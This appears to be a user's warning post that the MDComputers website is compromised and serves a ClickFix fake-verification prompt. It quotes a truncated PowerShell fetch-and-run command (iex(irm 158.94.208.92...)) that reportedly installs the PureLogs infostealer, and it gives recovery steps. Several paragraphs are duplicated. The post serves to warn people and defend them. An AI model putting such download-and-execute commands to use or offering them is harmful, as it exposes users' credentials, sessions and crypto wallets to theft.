just a massive heads up if you are planning to browse or buy anything from MDComputers. Do not visit the site, and absolutely do not make any payments or enter details there. Not only right now. Ever.
The site is built on WordPress and has clearly been severely compromised. This is the second time I have caught it attempting to launch critical attacks directly against visitors.
Specifically, it is currently serving a "ClickFix" fake browser update/verification prompt. If you interact with it, it forces your system to execute a malicious PowerShell command: iex(irm 158.94.208.92...).
This is not a false positive. That command pulls down a fileless threat designed to unpack and execute an infostealer binary (PureLogs Stealer) straight into memory. It targets your saved browser credentials, session cookies, crypto wallets, and 2FA authentication tokens.
If you have visited the site recently and noticed any weird pop-ups or ran a command it told you to copy-paste, change your critical passwords from a different device immediately, terminate all active web sessions, and run a deep offline malware scan.
The site is built on WordPress and has clearly been severely compromised. This is the second time I have caught it attempting to launch critical attacks directly against visitors.
Specifically, it is currently serving a "ClickFix" fake browser update/verification prompt. If you interact with it, it forces your system to execute a malicious PowerShell command: iex(irm 158.94.208.92...).
This is not a false positive. That command pulls down a fileless threat designed to unpack and execute an infostealer binary (PureLogs Stealer) straight into memory. It targets your saved browser credentials, session cookies, crypto wallets, and 2FA authentication tokens.
If you have visited the site recently and noticed any weird pop-ups or ran a command it told you to copy-paste, change your critical passwords from a different device immediately, terminate all active web sessions, and run a deep offline malware scan.
